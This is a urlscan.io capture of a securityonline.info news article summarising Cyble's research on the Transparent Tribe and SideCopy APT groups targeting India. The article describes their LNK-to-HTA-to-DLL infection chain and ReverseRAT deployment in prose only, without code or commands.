urlscan.io logo urlscan.io
SecurityTrails logo

securityonline.info Open in urlscan Pro
2a05:d014:776:a63d:6339:2a28:fc90:eea  Public Scan

Back to summary
URL: https://securityonline.info/transparent-tribe-sidecopy-a-dangerous-cyber-alliance-targeting-india/
Submission: On May 17 via api from IN — Scanned from DE

Form analysis 2 forms found in the DOM

https://securityonline.info/

<form role="search" class="search-form" action="https://securityonline.info/"><label><span class="screen-reader-text">Search for:</span>
    <input type="search" class="search-field" placeholder="Search …" name="s"></label>
  <input type="submit" class="search-submit" value="Search">
</form>

https://securityonline.info/

<form role="search" class="search-form" action="https://securityonline.info/"><label><span class="screen-reader-text">Search for:</span>
    <input type="search" class="search-field" placeholder="Search …" name="s"></label>
  <input type="submit" class="search-submit" value="Search">
</form>

Text Content

Skip to content

Penetration Testing


 * Search for:

 * Home
 * Cyber Security
 * Data Leak
 * Forensics
 * Malware Analysis
 * Malware Attack
 * Network PenTest
   * Information Gathering
   * Vulnerability Analysis
   * Exploitation
     * Metasploit
   * Post Exploitation
   * Maintaining Access
   * Password Attacks
   * Sniffing & Spoofing
   * Smartphone PenTest
   * Wireless
 * Reverse Engineering
 * Vulnerability
 * Web PenTest
   * Web Information Gathering
   * Web Vulnerability Analysis
   * Web Exploitation
   * Web Maintaining Access
   * Reporting

 * Home
 * Cyber Security
 * Data Leak
 * Forensics
 * Malware Analysis
 * Malware Attack
 * Network PenTest
   * Information Gathering
   * Vulnerability Analysis
   * Exploitation
     * Metasploit
   * Post Exploitation
   * Maintaining Access
   * Password Attacks
   * Sniffing & Spoofing
   * Smartphone PenTest
   * Wireless
 * Reverse Engineering
 * Vulnerability
 * Web PenTest
   * Web Information Gathering
   * Web Vulnerability Analysis
   * Web Exploitation
   * Web Maintaining Access
   * Reporting

Search for:

Penetration Testing


 * Cyber Security


TRANSPARENT TRIBE & SIDECOPY: A DANGEROUS CYBER ALLIANCE TARGETING INDIA

by do son · May 16, 2024



In a recent analysis, Cyble Research and Intelligence Labs (CRIL) has uncovered
alarming developments involving two Advanced Persistent Threat (APT) groups,
Transparent Tribe (APT36) and SideCopy. These threat actors are employing
sophisticated and overlapping cyber strategies to target India, posing
significant risks to both public and private sectors.

In the first week of May, CRIL identified a malicious website associated with
the SideCopy APT group. This website hosted a file named “files.zip,” containing
three directories: “economy,” “it,” and “survey.” The “survey” directory was
found to contain lure files similar to those used in previous campaigns, while
the other two directories remain undisclosed.

SideCopy’s malicious website | Image: CRIL

Upon further investigation, CRIL uncovered the use of malicious LNK files in the
SideCopy malware campaign. These files, once executed, trigger a series of
commands leading to the deployment of malware. The infection starts with a spam
email, prompting the download of a ZIP file containing an LNK file disguised as
a document. When executed, this file initiates the launch of “mshta.exe” to
connect to a malicious URL and download an HTA file, which further executes a
malicious DLL.

Please enable JavaScript



Video Player is loading.
Play Video
Play
Unmute

Current Time 0:00
/
Duration 7:12
0:00




Remaining Time -7:12
1x
Playback Rate

Captions
 * captions off, selected

Auto(360pLQ)

Fullscreen
Settings
 * Settings
 * Speed1x
 * Qualityauto

 * Back
 * 2x
 * 1.5x
 * 1x, selected
 * 0.5x

 * Back

Watch on HumixShare






The Rise of Cybersecurity Threats: Protecting Digital Assets
Share
Watch on




The HTA file concatenates embedded Base64-encoded strings, decodes them, and
writes the resulting content into memory as a malicious DLL named
“PreBotHTta.dll.” This DLL uses ActiveX objects for dynamic method invocation to
execute its payload, which includes decoding and decompressing additional
malicious content.

Infection chain | Image: CRIL

The malware then downloads a text file from a specified URL, saves it as
“newFile.txt,” and utilizes it for further malicious activities. Depending on
the installed antivirus software, different execution paths are followed. For
instance, if Kaspersky AV is detected, the malware drops additional HTA and
batch files to maintain persistence. Similar methods are employed for systems
with other antivirus software, ensuring the malware remains active and
undetected.

In some cases, the malware deploys ReverseRAT, a Remote Access Trojan, by
continuously performing malicious activities such as data exfiltration and
system monitoring. This RAT adapts its behavior based on the installed antivirus
software, showcasing the attackers’ adaptability and sophistication.

The SideCopy APT group, operating as a subgroup of Transparent Tribe, presents a
significant threat due to their advanced and coordinated attack vectors. Their
ability to deploy versatile malware like ReverseRAT and Action RAT underscores
the need for robust and flexible cybersecurity defenses.




Share







Tags: APT groupAPT36SideCopySideCopy APT groupTransparent Tribe

 * Previous story CVE-2024-34716: Critical Security Vulnerability Uncovered in
   PrestaShop



Follow:

 * 
 * 
 * 
 * 
 * 
 * 


SEARCH



Secure Your Connection


 * Popular Posts
 * Tags

 * Cyber Security
   
   Transparent Tribe & SideCopy: A Dangerous Cyber Alliance Targeting India
   
   May 16, 2024

 * Cyber Security / Vulnerability
   
   Old Vulnerability, New Attacks: Botnets Swarm Exploited CVE-2023-1389 in
   TP-Link Routers
   
   April 16, 2024

 * Malware
   
   Unstoppable Malware? Report Warns of “Mobile NotPetya” Outbreak Risk
   
   April 16, 2024

 * Malware
   
   Beware! Fake Chrome App “Mamont” Steals Banking Details
   
   April 16, 2024

 * Cyber Security / Malware
   
   “INC” Ransomware Surge: New GOLD IONIC Group Hits Global Targets
   
   April 16, 2024

 * active directory AMD android Apple backdoor BurpSuite chrome CISA cisco
   cyberattack Data Breach facebook gitlab google google chrome hacker kali
   linux Linux Linux Kernel macOS malware metasploit Microsoft nmap nvidia OSINT
   penetration testing Pentesting PoC powershell privilege escalation Python
   ransomware shodan sqli sql injection ssh vmware Vulnerability web app
   webshell windows wireless wordpress XSS





Reward


BRILLIANTLY

SAFE!




securityonline.info


CONTENT & LINKS

Verified by Sur.ly



2022


WEBSITE

 1. About SecurityOnline.info
 2. Advertise on SecurityOnline.info
 3. Contact



 * About Us
 * Contact Us
 * Disclaimer
 * Privacy Policy
 * DMCA NOTICE

Penetration Testing © 2024. All Rights Reserved.

 * 
 * 
 * 
 * 
 * 
 * 


x
x

✕


🍪 PRIVACY & TRANSPARENCY

We and our partners use cookies to Store and/or access information on a device.
We and our partners use data for Personalised advertising and content,
advertising and content measurement, audience research and services development
. An example of data being processed may be a unique identifier stored in a
cookie. Some of our partners may process your data as a part of their legitimate
business interest without asking for consent. To view the purposes they believe
they have legitimate interest for, or to object to this data processing use the
vendor list link below. The consent submitted will only be used for data
processing originating from this website. If you would like to change your
settings or withdraw consent at any time, the link to do so is in our privacy
policy accessible from our home page.

856 Partners are included for the above purposes.



Manage Settings Allow Necessary Cookies & Continue Continue with Recommended
Cookies

Vendor List | Privacy Policy